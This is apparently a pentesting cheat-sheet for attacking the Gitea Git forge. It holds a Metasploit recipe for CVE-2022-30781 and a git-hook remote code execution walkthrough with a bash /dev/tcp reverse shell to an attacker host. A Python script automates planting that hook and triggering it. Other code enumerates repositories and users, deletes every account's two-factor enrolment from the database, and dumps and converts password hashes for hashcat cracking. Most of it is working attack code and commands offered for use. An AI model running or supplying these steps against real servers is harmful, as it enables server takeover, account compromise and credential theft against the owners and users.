# Gitea Pentesting

Gitea is a self-hosted Git forge written in Go: repository hosting with a web UI, server-side hooks, webhooks and a REST API, all of which are covered below.

### Common Directories <a href="#common-directories" id="common-directories"></a>

```shellscript
/api/swagger
/api/v1/repos/search?q=test
/api/v1/users/search?q=test
/api/v1/users/<username>/repos
/explore/organizations
/explore/repos
/explore/users

# OAuth
/.well-known/openid-configuration
/login/oauth/authorize
/login/oauth/access_token
/login/oauth/userinfo
/login/oauth/keys
```

### Investigation <a href="#investigation" id="investigation"></a>

#### Source Code in Repositories <a href="#source-code-in-repositories" id="source-code-in-repositories"></a>

If we can access repositories, we may find sensitive information in them, e.g. credentials, subdomains, other domains, secret keys, etc.\
So read through the source code, including config files and CI definitions.

#### Go Back to Previous Commits <a href="#go-back-to-previous-commits" id="go-back-to-previous-commits"></a>

We can browse the source code at previous commits and find sensitive information that a committer disclosed by accident and later removed; removal in a newer commit does not purge it from history.

#### Get Secrets in Web Hooks <a href="#get-secrets-in-web-hooks" id="get-secrets-in-web-hooks"></a>

In an existing repository we may find the webhook secret under **repository → Settings → Webhooks**. The secret is the HMAC key Gitea uses to sign deliveries (the `X-Gitea-Signature` header), so it also lets us craft deliveries that the receiving endpoint will accept.

#### Find User Credentials <a href="#find-user-credentials" id="find-user-credentials"></a>

If we have a shell on the target system and a working copy of a repository that is pushed to Gitea exists there, its git configuration may hold credentials: remote URLs with an embedded `user:password@`, or a `credential.helper = store` entry pointing at a plaintext credentials file.

```
cd /path/to/gitea/repo
# remote URLs may embed credentials (https://user:pass@host/...); --show-origin tells which config file set each value
git config -l --show-origin
# credential.helper "store" keeps plaintext logins in this file
cat ~/.git-credentials
```

### Git Fetch Remote Code Execution (RCE) <a href="#git-fetch-remote-code-execution-rce" id="git-fetch-remote-code-execution-rce"></a>

[CVE-2022-30781](https://nvd.nist.gov/vuln/detail/CVE-2022-30781)\
Gitea before 1.16.7 does not escape the remote passed to `git fetch` when migrating a repository, so an authenticated user who can start a migration can inject git options and get command execution as the Gitea service user. Valid credentials for any account are therefore required.

#### Metasploit <a href="#metasploit" id="metasploit"></a>

```
msfconsole
msf> use exploit/multi/http/gitea_git_fetch_rce
msf> set RHOSTS <target-ip>
msf> set USERNAME <gitea-user>
msf> set PASSWORD <gitea-password>
msf> set LHOST <attacker-ip>
# set TARGETURI if Gitea is served under a sub-path
msf> run
```

### Git Hooks Remote Code Execution (RCE) <a href="#git-hooks-remote-code-execution-rce" id="git-hooks-remote-code-execution-rce"></a>

[CVE-2020-14144](https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce)\
It affects Gitea versions 1.1.0 through 1.12.5, but the underlying behaviour is the Git Hooks feature itself: an account allowed to edit server-side hooks (site administrators by default) can run arbitrary commands as the Gitea service user on every push. Newer releases ship with `DISABLE_GIT_HOOKS = true` under `[security]` in `app.ini`; the steps below still work wherever an administrator has turned the feature back on.

#### 1. Login <a href="#id-1-login" id="id-1-login"></a>

Log in to the Gitea web UI with an existing account that has the Git hooks permission (a site administrator, or a user an administrator has granted that permission). Without it the **Git Hooks** tab in step 3 is not shown.

#### 2. Create a New Repository <a href="#id-2-create-a-new-repository" id="id-2-create-a-new-repository"></a>

#### 3. Go to the Repository’s Settings <a href="#id-3-go-to-the-repositorys-settings" id="id-3-go-to-the-repositorys-settings"></a>

In the new repository we’ve created, go to **Settings → Git Hooks → post-receive**.

#### 4. Update to the Reverse Shell Payload <a href="#id-4-update-to-the-reverse-shell-payload" id="id-4-update-to-the-reverse-shell-payload"></a>

In the post-receive edit page, inject the payload as below (note the `0>&1`: without it the shell's input is not connected to the socket and commands typed on the listener never reach it):

```
#!/bin/bash

bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
```

#### 5. Start Listener in Terminal <a href="#id-5-start-listener-in-terminal" id="id-5-start-listener-in-terminal"></a>

To receive the outbound connection made by the git hook, start a listener on the attacker host (10.0.0.1 in the payload above):

```
nc -lvnp 4444
```

#### 6. Create the New Repository in Terminal <a href="#id-6-create-the-new-repository-in-terminal" id="id-6-create-the-new-repository-in-terminal"></a>

```
mkdir test
cd test
touch README.md
git init
git add README.md
git commit -m "first commit"
git remote add origin https://<target-ip>/<username>/test.git
# if your git created "main" instead of "master", push that branch name instead
git push -u origin master
```

After the push completes, the server-side post-receive hook runs and executes the reverse shell command as the Gitea service user.\
We should now have a shell on the listener.
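The same six steps can be driven through the REST API instead of the web UI, which is handy when the target has many repositories or when the session is scripted. The following is an added example, not code from the original page or from the Gitea project; the base URL, token and username are placeholders, and it assumes the token belongs to an account allowed to edit Git hooks (the `hooks/git` endpoints are refused otherwise) and that Gitea accepts the access token as the HTTPS password for the push.

```python
import json
import subprocess
import tempfile
import urllib.request
from urllib.parse import urlsplit, urlunsplit

# Placeholders (assumptions for this example), not values from the page.
BASE_URL = "http://gitea.example.local:3000"
TOKEN = "<access token of an account allowed to edit Git hooks>"
USERNAME = "<username>"
LHOST, LPORT = "10.0.0.1", 4444


def reverse_shell_hook(lhost, lport):
    """Same post-receive body as pasted in the UI above, with stdin wired to the socket as well."""
    return "#!/bin/bash\n\nbash -i >& /dev/tcp/%s/%d 0>&1\n" % (lhost, lport)


def api(method, path, body=None, base=BASE_URL, token=TOKEN):
    """Minimal JSON call against /api/v1 using the token as an Authorization header."""
    data = None if body is None else json.dumps(body).encode()
    req = urllib.request.Request(base.rstrip("/") + "/api/v1" + path, data=data, method=method,
                                 headers={"Authorization": "token " + token,
                                          "Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        raw = resp.read()
        return json.loads(raw) if raw else None


def create_repo(name):
    # POST /user/repos -> repository object; its clone_url is what we push to
    return api("POST", "/user/repos", {"name": name, "auto_init": False})


def set_git_hook(owner, repo, hook_id, content):
    # PATCH /repos/{owner}/{repo}/hooks/git/{id}; id is pre-receive, update or post-receive
    return api("PATCH", f"/repos/{owner}/{repo}/hooks/git/{hook_id}", {"content": content})


def with_basic_auth(clone_url, user, token):
    """Embed user:token in the clone URL so git can push over HTTPS non-interactively."""
    parts = urlsplit(clone_url)
    netloc = f"{user}:{token}@{parts.hostname}" + (f":{parts.port}" if parts.port else "")
    return urlunsplit(parts._replace(netloc=netloc))


def push_to_trigger(auth_url):
    """Step 6 from the walkthrough: init, commit README.md, push master so post-receive fires."""
    with tempfile.TemporaryDirectory() as workdir:
        def git(*args):
            subprocess.run(["git", *args], cwd=workdir, check=True, capture_output=True)
        git("init")
        git("symbolic-ref", "HEAD", "refs/heads/master")  # portable alternative to `git init -b master`
        open(f"{workdir}/README.md", "w").close()
        git("add", "README.md")
        git("-c", "user.name=pentest", "-c", "user.email=pentest@example.com",
            "commit", "-m", "first commit")
        git("remote", "add", "origin", auth_url)
        git("push", "-u", "origin", "master")


if __name__ == "__main__":
    repo = create_repo("test")
    set_git_hook(USERNAME, "test", "post-receive", reverse_shell_hook(LHOST, LPORT))
    # start `nc -lvnp 4444` first; the push below makes the server run the hook as the Gitea user
    push_to_trigger(with_basic_auth(repo["clone_url"], USERNAME, TOKEN))
```

A 403 from the `hooks/git` call is the quickest way to learn that the account lacks the Git hooks permission or that `DISABLE_GIT_HOOKS` is on, without clicking through the UI.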

### Swagger API <a href="#swagger-api" id="swagger-api"></a>

We can open **`/api/swagger`** to interact with the REST API through its **Swagger UI**; the same routes can be called directly with `curl` once we have a token.

#### Get New Token & Authorize <a href="#get-new-token-authorize" id="get-new-token-authorize"></a>

We need a personal access token to call the API from Swagger.

1. Register a new account from the Gitea top page (if self-registration is enabled).
2. Go to **`/user/settings/applications`** and generate a new token under "Manage Access Tokens".
3. Copy the token value e.g. “fa2c2428817d64c1b890d404a905f7be2ffd4bde”; Gitea shows it only once.
4. Go to **`/api/swagger`**.
5. Click the “Authorize” button. The modal window opens.
6. Paste the token in the “Token” section (sent as a `token=` query parameter), or enter `token <value>` in “AuthorizationHeaderToken” to send it as an `Authorization` header.
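The search routes listed under Common Directories and the token from the steps above together give a quick inventory of an instance: unauthenticated, `/repos/search` and `/users/search` return only public data; with the token they also return whatever the account can see, including private repositories. The script below is an added example (not code from the original page or from the Gitea project); the base URL and token are placeholders, and the sample response is constructed so the parsing part runs offline.

```python
import json
import urllib.parse
import urllib.request

# Placeholders (assumptions for this example), not values from the page.
BASE_URL = "http://gitea.example.local:3000"
TOKEN = None  # e.g. the value from /user/settings/applications; None = unauthenticated


def gitea_get(base, path, params=None, token=None):
    """GET /api/v1<path>; the same endpoint answers with more data when a token is supplied."""
    url = base.rstrip("/") + "/api/v1" + path
    if params:
        url += "?" + urllib.parse.urlencode(params)
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    if token:
        req.add_header("Authorization", "token " + token)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.load(resp)


def summarize_repos(search_result):
    """/repos/search answers {"ok": true, "data": [repo, ...]}; keep the fields worth triaging."""
    return [
        {
            "full_name": r["full_name"],
            "private": bool(r.get("private")),
            "default_branch": r.get("default_branch"),
            "clone_url": r.get("clone_url"),
        }
        for r in search_result.get("data", [])
    ]


def summarize_users(search_result):
    """/users/search uses the same envelope; email may be empty for unauthenticated callers."""
    return [(u["login"], u.get("email") or "") for u in search_result.get("data", [])]


def paginate(fetch_page, limit=50):
    """Walk ?page=N&limit=50 until a short page comes back. 50 is the default
    [api] MAX_RESPONSE_ITEMS cap; a larger limit is silently reduced, which would end the walk early."""
    page, items = 1, []
    while True:
        chunk = fetch_page(page, limit)
        items.extend(chunk)
        if len(chunk) < limit:
            return items
        page += 1


def enumerate_instance(base, token=None, query=""):
    repos = paginate(lambda p, n: summarize_repos(
        gitea_get(base, "/repos/search", {"q": query, "page": p, "limit": n}, token)))
    users = paginate(lambda p, n: summarize_users(
        gitea_get(base, "/users/search", {"q": query, "page": p, "limit": n}, token)))
    return repos, users


# Constructed sample response (not captured from a real server) so the parsing runs offline.
SAMPLE_REPO_SEARCH = {
    "ok": True,
    "data": [
        {"full_name": "alice/infra", "private": True, "default_branch": "main",
         "clone_url": "http://gitea.example.local:3000/alice/infra.git"},
        {"full_name": "bob/website", "private": False, "default_branch": "master",
         "clone_url": "http://gitea.example.local:3000/bob/website.git"},
    ],
}

if __name__ == "__main__":
    for row in summarize_repos(SAMPLE_REPO_SEARCH):
        print(row)
    # against a live target: repos, users = enumerate_instance(BASE_URL, TOKEN)
```

Running `enumerate_instance` once without a token and once with it, then diffing the `full_name` lists, shows exactly which repositories the compromised account exposes beyond what an anonymous visitor already sees.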

### Delete the Two-Factor <a href="#delete-the-two-factor" id="delete-the-two-factor"></a>

With write access to Gitea's database we can remove every user's TOTP enrolment, after which the password alone logs them in. The example below assumes SQLite; check `DB_TYPE` and `PATH` under `[database]` in `app.ini`, and run the same `DELETE` through the MySQL/PostgreSQL client if the backend is not SQLite.

```
victim@machine:/gitea/gitea$ python3

>>> import sqlite3
>>> conn=sqlite3.connect('gitea.db')   # path from [database] PATH in app.ini
>>> conn.execute('delete from two_factor')   # all TOTP secrets; restrict to one account with "where uid = <user id>"
>>> conn.commit()
>>> conn.close()
```

### Dump Credentials in Database <a href="#dump-credentials-in-database" id="dump-credentials-in-database"></a>

Reference: [Cracking Gitea's PBKDF2 Password Hashes](https://www.unix-ninja.com/p/cracking_giteas_pbkdf2_password_hashes)

When Gitea is configured with `DB_TYPE = sqlite3` (see `[database]` in `app.ini`), the whole database is a single file and user password hashes can be read straight out of it.

```
# 1. Open it with `sqlite3`
sqlite3 /path/to/gitea/data/gitea.db
# 2. Retrieve credentials from the `user` table
sqlite> select email,salt,passwd,passwd_hash_algo from user;
```

Once the hashes are found, we can convert them to hashcat format using [gitea2hashcat](https://github.com/unix-ninja/hashcat/blob/master/tools/gitea2hashcat.py).

```
# Paste the hashes (salt|passwd only) of the result above
python3 gitea2hashcat.py '<salt>|<passwd>'
```

Copy the output and crack it with Hashcat:

```
# -m 10900 is PBKDF2-HMAC-SHA256, which matches passwd_hash_algo = pbkdf2 (the Gitea default).
# Rows with passwd_hash_algo = bcrypt hold a $2a$... string that goes straight to -m 3200 instead.
hashcat -m 10900 '<hash>' wordlist.txt
```
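What the conversion tool does is worth having in a few lines of our own: Gitea's default `pbkdf2` algorithm is PBKDF2-HMAC-SHA256 with 10000 rounds and a 50-byte output, hex-encoded, with the `salt` column used as raw ASCII bytes, and hashcat mode 10900 expects `sha256:<rounds>:<base64 salt>:<base64 digest>`. Newer Gitea releases record the parameters in the algorithm name (e.g. `pbkdf2$50000$50`), so the rounds must be read from `passwd_hash_algo` rather than assumed. The block below is an added example, not the page's tool or Gitea's code; the sample row is constructed (the hash is computed in the script, not taken from any real database), and the 10000/50 fallback for a bare `pbkdf2` value is the legacy default.

```python
import base64
import hashlib
import hmac

# Legacy default for passwd_hash_algo == "pbkdf2" (assumption: pre-parameterised Gitea releases).
LEGACY_ITER, LEGACY_KEYLEN = 10000, 50


def parse_pbkdf2_algo(algo):
    """Return (iterations, keylen) for a passwd_hash_algo value, or None if it is not PBKDF2."""
    if algo == "pbkdf2":
        return LEGACY_ITER, LEGACY_KEYLEN
    if algo.startswith("pbkdf2$"):
        _, iters, keylen = algo.split("$")
        return int(iters), int(keylen)
    return None  # bcrypt, scrypt, argon2: different hashcat modes, not handled here


def gitea_pbkdf2(password, salt, iterations=LEGACY_ITER, keylen=LEGACY_KEYLEN):
    """Hex digest exactly as Gitea stores it in user.passwd (salt taken as ASCII bytes)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations, keylen).hex()


def to_hashcat_10900(salt, passwd_hex, iterations=LEGACY_ITER):
    """Build the -m 10900 line: sha256:<iterations>:<b64 salt>:<b64 digest>."""
    b64 = lambda b: base64.b64encode(b).decode()
    return "sha256:%d:%s:%s" % (iterations, b64(salt.encode()), b64(bytes.fromhex(passwd_hex)))


def verify(password, salt, passwd_hex, algo="pbkdf2"):
    """Offline check of a candidate password against one row, e.g. to confirm a hashcat result."""
    params = parse_pbkdf2_algo(algo)
    if params is None:
        raise ValueError("not a PBKDF2 hash: " + algo)
    return hmac.compare_digest(gitea_pbkdf2(password, salt, *params), passwd_hex)


def rows_to_hashcat(rows):
    """rows are (email, salt, passwd, passwd_hash_algo) tuples as returned by the sqlite query above.
    Returns 'email:hash' lines for PBKDF2 rows (use hashcat --username); other algorithms are skipped."""
    out = []
    for email, salt, passwd, algo in rows:
        params = parse_pbkdf2_algo(algo)
        if params is None:
            continue
        out.append("%s:%s" % (email, to_hashcat_10900(salt, passwd, params[0])))
    return out


if __name__ == "__main__":
    # Constructed sample row, not a real dump: the digest is computed here from a known password.
    salt = "abcdefghij"
    row = ("alice@example.com", salt, gitea_pbkdf2("password", salt), "pbkdf2")
    for line in rows_to_hashcat([row]):
        print(line)
```

Feed the output to `hashcat -m 10900 --username hashes.txt wordlist.txt`; a row whose `passwd_hash_algo` is not `pbkdf2`-based is skipped on purpose, because converting it with these parameters would only produce an uncrackable line.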
